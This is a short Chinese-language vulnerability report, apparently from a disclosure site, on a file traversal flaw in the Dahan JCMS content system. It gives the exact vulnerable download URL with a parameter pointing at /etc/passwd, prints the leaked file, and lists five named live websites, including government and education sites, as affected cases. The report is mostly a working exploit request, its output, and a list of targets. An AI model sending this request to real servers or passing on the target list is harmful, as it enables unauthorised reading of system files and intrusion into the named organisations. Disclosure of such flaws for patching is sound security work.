### 简要描述:
大汉网络文件遍历
### 详细说明:
漏洞Url:
/jcms/m_5_e/module/voting/down.jsp?filename=a.txt&pathfile=/etc/passwd
下载文件:
```
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
```
### 漏洞证明:
案例:
http://aid.ec.js.edu.cn/
http://www.zjb.org.cn/
http://122.224.183.4/
http://ghj.anxiang.gov.cn/
http://www.tianyige.com.cn/
暂无评论